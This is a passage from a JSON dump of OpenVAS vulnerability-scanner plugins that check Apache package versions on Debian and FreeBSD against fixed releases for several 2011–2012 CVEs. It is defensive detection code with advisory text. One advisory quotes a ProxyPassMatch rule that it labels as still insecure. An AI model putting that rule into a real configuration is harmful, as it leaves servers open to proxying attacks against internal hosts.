http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", 
ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n 
report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.22-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:35", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "FreeBSD Ports: apache", "bulletinFamily": "scanner", "cvss2": 
{}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "modified": "2018-10-05T00:00:00", "id": "OPENVAS:136141256231070737", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070737", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_apache20.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70737\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_version(\"$Revision: 11762 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 07:27:19 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"FreeBSD Ports: apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: apache\n\nCVE-2011-3368\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character.\n\nCVE-2011-3607\nInteger overflow in the ap_pregsub function in server/util.c in the\nApache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when\nthe mod_setenvif module is enabled, allows local users to gain\nprivileges via a .htaccess file with a crafted SetEnvIf directive, in\nconjunction with a crafted HTTP request header, leading to a\nheap-based buffer overflow.\n\nCVE-2011-4317\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision\n1179239 patch is in place, does not properly interact with use of (1)\nRewriteRule and (2) ProxyPassMatch pattern matches for configuration\nof a reverse proxy, which allows remote attackers to send requests to\nintranet servers via a malformed URI containing an @ (at sign)\ncharacter and a : (colon) character in invalid positions. 
NOTE: this\nvulnerability exists because of an incomplete fix for CVE-2011-3368.\n\nCVE-2012-0021\nThe log_cookie function in mod_log_config.c in the mod_log_config\nmodule in the Apache HTTP Server 2.2.17 through 2.2.21, when a\nthreaded MPM is used, does not properly handle a %{}C format string,\nwhich allows remote attackers to cause a denial of service (daemon\ncrash) via a cookie that lacks both a name and a value.\n\nCVE-2012-0031\nscoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow\nlocal users to cause a denial of service (daemon crash during\nshutdown) or possibly have unspecified other impact by modifying a\ncertain type field within a scoreboard shared memory segment, leading\nto an invalid call to the free function.\n\nCVE-2012-0053\nprotocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not\nproperly restrict header information during construction of Bad\nRequest (aka 400) error documents, which allows remote attackers to\nobtain the values of HTTPOnly cookies via vectors involving a (1) long\nor (2) malformed header in conjunction with crafted web script.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2\")>0 && revcomp(a:bver, b:\"2.2.22\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": 
"2017-07-02T21:10:44", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2012-02-12T00:00:00", "type": "openvas", "title": "FreeBSD Ports: apache", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "modified": "2017-04-24T00:00:00", "id": "OPENVAS:70737", "href": "http://plugins.openvas.org/nasl.php?oid=70737", "sourceData": "#\n#VID 4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 4b7dbfab-4c6b-11e1-bc16-0023ae8e59f0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: apache\n\nCVE-2011-3368\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character.\n\nCVE-2011-3607\nInteger overflow in the ap_pregsub function in server/util.c in the\nApache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when\nthe mod_setenvif module is enabled, allows local users to gain\nprivileges via a .htaccess file with a crafted SetEnvIf directive, in\nconjunction with a crafted HTTP request header, leading to a\nheap-based buffer overflow.\n\nCVE-2011-4317\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision\n1179239 patch is in place, does not properly interact with use of (1)\nRewriteRule and (2) ProxyPassMatch pattern matches for configuration\nof a reverse proxy, which allows remote attackers to send requests to\nintranet servers via a malformed URI containing an @ (at sign)\ncharacter and a : (colon) character in invalid positions. 
NOTE: this\nvulnerability exists because of an incomplete fix for CVE-2011-3368.\n\nCVE-2012-0021\nThe log_cookie function in mod_log_config.c in the mod_log_config\nmodule in the Apache HTTP Server 2.2.17 through 2.2.21, when a\nthreaded MPM is used, does not properly handle a %{}C format string,\nwhich allows remote attackers to cause a denial of service (daemon\ncrash) via a cookie that lacks both a name and a value.\n\nCVE-2012-0031\nscoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow\nlocal users to cause a denial of service (daemon crash during\nshutdown) or possibly have unspecified other impact by modifying a\ncertain type field within a scoreboard shared memory segment, leading\nto an invalid call to the free function.\n\nCVE-2012-0053\nprotocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not\nproperly restrict header information during construction of Bad\nRequest (aka 400) error documents, which allows remote attackers to\nobtain the values of HTTPOnly cookies via vectors involving a (1) long\nor (2) malformed header in conjunction with crafted web script.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70737);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_version(\"$Revision: 6018 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-24 11:02:24 +0200 (Mon, 24 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 07:27:19 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"FreeBSD Ports: apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft 
Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\ntxt = \"\";\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2\")>0 && revcomp(a:bver, b:\"2.2.22\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:19", "description": "The remote host is missing an update to apache2\nannounced via advisory DSA 2405-1.", "cvss3": {}, "published": "2012-02-13T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2405-1 (apache2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231070724", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070724", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2405_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2405-1 (apache2)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70724\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3368\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 11:19:29 -0500 (Mon, 13 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2405-1 (apache2)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6|7)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202405-1\");\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been found in the Apache HTTPD Server:\n\nCVE-2011-3607:\n\nAn integer overflow in ap_pregsub() could allow local attackers to\nexecute arbitrary code at elevated privileges via crafted .htaccess\nfiles.\n\nCVE-2011-3368 CVE-2011-3639 CVE-2011-4317:\n\nThe Apache HTTP Server did not properly validate the request URI for\nproxied requests. In certain reverse proxy configurations using the\nProxyPassMatch directive or using the RewriteRule directive with the\n[P] flag, a remote attacker could make the proxy connect to an\narbitrary server. The could allow the attacker to access internal\nservers that are not otherwise accessible from the outside.\n\nThe three CVE ids denote slightly different variants of the same\nissue.\n\nNote that, even with this issue fixed, it is the responsibility of\nthe administrator to ensure that the regular expression replacement\npattern for the target URI does not allow a client to append arbitrary\nstrings to the host or port parts of the target URI. For example, the\nconfiguration\n\nProxyPassMatch ^/mail(.*) http://example.com$1\n\nis still insecure and should be replaced by one of the following\nconfigurations:\n\nProxyPassMatch ^/mail(/.*) http://example.com$1\nProxyPassMatch ^/mail/(.*) http://example.com/$1\n\nCVE-2012-0031:\n\nAn apache2 child process could cause the parent process to crash\nduring shutdown. 
This is a violation of the privilege separation\nbetween the apache2 processes and could potentially be used to worsen\nthe impact of other vulnerabilities.\n\nCVE-2012-0053:\n\nThe response message for error code 400 (bad request) could be used to\nexpose httpOnly cookies. This could allow a remote attacker using\ncross site scripting to steal authentication cookies.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion apache2 2.2.9-10+lenny12.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion apache2 2.2.16-6+squeeze6\n\nFor the testing distribution (wheezy), these problems will be fixed in\nversion 2.2.22-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.2.22-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your apache2 packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to apache2\nannounced via advisory DSA 2405-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", 
ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.9-10+lenny12\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += 
res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.16-6+squeeze6\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-dbg\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-itk\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-bin\", ver:\"2.2.22-1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"apache2.2-common\", 
